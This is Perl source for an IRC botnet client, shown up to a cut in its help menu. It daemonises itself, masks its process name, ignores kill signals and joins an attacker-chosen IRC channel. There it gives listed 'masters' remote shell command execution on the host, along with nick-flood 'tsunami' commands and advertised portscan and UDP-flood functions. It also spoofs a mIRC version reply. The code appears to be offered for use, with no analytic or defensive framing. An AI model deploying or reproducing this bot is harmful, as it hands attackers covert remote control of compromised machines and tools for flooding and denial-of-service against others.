#!/usr/bin/perl use LWP::UserAgent; my $linas_max = '5'; my $sleep = '7'; my $VERSAO = "2.3.4-1"; $servidor = $ARGV[0] unless $servidor; my $porta = $ARGV[1]; my $nick = $ARGV[2]; my $ircname = $ARGV[3]; my @canais = ('#'.$ARGV[4]); my @adms = ($ARGV[5]); my $processo = $ARGV[6]; chop (my $realname = `hostname`); my $success = "\n [+] Bot Shell\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n\n"; my $failed = "\n [?] perl $0 \n\n"; if (@ARGV != 7) { print $failed; exit(); } else { print $success; } $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; use IO::Socket; use Socket; use IO::Select; chdir("/"); $servidor="$ARGV[0]" if $ARGV[0]; $0="$processo"."\0"x16;; my $pid=fork; exit if $pid; die "Problema com o fork: $!" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_cliente = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub conectar { my $meunick = $_[0]; my $servidor_con = $_[1]; my $porta_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_cliente->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; nick("$meunick"); sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); sleep 1; } } my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_cliente->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $msg, 4096); if ($nread == 0) { $sel_cliente->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $msg); for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^\001VERSION\001$/) { notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001"); } if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { if ($onde eq "$meunick"){ shell("$pn", "$args"); } if ($args =~ /^(\Q$meunick\E|\!bht)\s+(.*)/ ) { my $natrix = $1; my $arg = $2; if ($arg =~ /^\!(.*)/) { ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); } elsif ($arg =~ /^\@(.*)/) { $ondep = $onde; $ondep = $pn if $onde eq $meunick; bfunc("$ondep","$1", "$pn"); } else { shell("$onde", "$arg"); } } } } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($meunick)) { $meunick=$4; $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick("$meunick-".int rand(999999)); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $meunick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; foreach my $canal (@canais) { sendraw("JOIN $canal"); sendraw("PRIVMSG @adms :You Are My Master"); } } } sub bfunc { my $msgpriv = "$_[2]"; my $printl = $_[0]; my $funcarg = $_[1]; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($funcarg =~ /^nick (.*)/) { sendraw($IRC_cur_socket, "NICK ".$1); $nick=$1; } if ($funcarg =~ /^join (.*)/) { sendraw($IRC_cur_socket, "JOIN ".$1); } if ($funcarg =~ /^part (.*)/) { sendraw($IRC_cur_socket, "PART ".$1); } if ($funcarg =~ /^msg\s+(\S+) (.*)/) { sendraw($IRC_cur_socket, "PRIVMSG ".$1." :".$2); } if ($funcarg =~ /^op (.*)/) { sendraw($IRC_cur_socket, "MODE $printl +o ".$1); } if ($funcarg =~ /^deop (.*)/) { sendraw($IRC_cur_socket, "MODE $printl -o ".$1); } if ($funcarg =~ /^voice (.*)/) { sendraw($IRC_cur_socket, "MODE $printl +v ".$1); } if ($funcarg =~ /^die (.*)/) { sendraw($IRC_cur_socket, "QUIT :".$1); $killd = "kill -9 ".fork; system (`$killd`); } if ($funcarg =~ /^devoice (.*)/) { sendraw($IRC_cur_socket, "MODE $printl -v ".$1); } if ($funcarg =~ /^say (.*)/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :".$1); } if ($funcarg =~ /^reset(.*)/) { sendraw($IRC_cur_socket, "QUIT :Di3 for my Master"); } if ($funcarg =~ /^die(.*)/) { if ($1 eq ""){ sendraw($IRC_cur_socket, "QUIT :Di3 for my Master"); $killd = "kill -9 ".fork; system (`$killd`); } } if ($funcarg =~ /^tsunami\s+(\d+)\s+(.*)/) { for (my $dx=0; $dx<=$1; $dx++) { my @nickxxxx = ("\\","|","_","-","`","^","{","}","[","]"); $nickfgv = $nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx]; $msgflood = ""; $msgflood = $msgflood.$msgflood; sendraw($IRC_cur_socket, "NICK ".$nickfgv); sleep 10; sendraw($IRC_cur_socket, "PRIVMSG ".$2." :".$msgflood); sleep 2; sendraw($IRC_cur_socket, "NOTICE ".$2." :".$msgflood); } sendraw($IRC_cur_socket, "NICK ".$nick); } if ($funcarg =~ /^help(.*)/) { if ($printl eq "$msgpriv"){ $msghelp ="PRIVMSG $msgpriv"; }else{ $msghelp ="NOTICE $msgpriv"; } sendraw($IRC_cur_socket, $msghelp." :15(7@2Command List @adms15)"); sendraw($IRC_cur_socket, $msghelp." :15(7@2Copyright (C) 200715)"); sleep 2; sendraw($IRC_cur_socket, $msghelp." :12<------------------------------------------------>"); sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2help15)"); sleep 2; sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2portscan15) "); sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2udpflood15)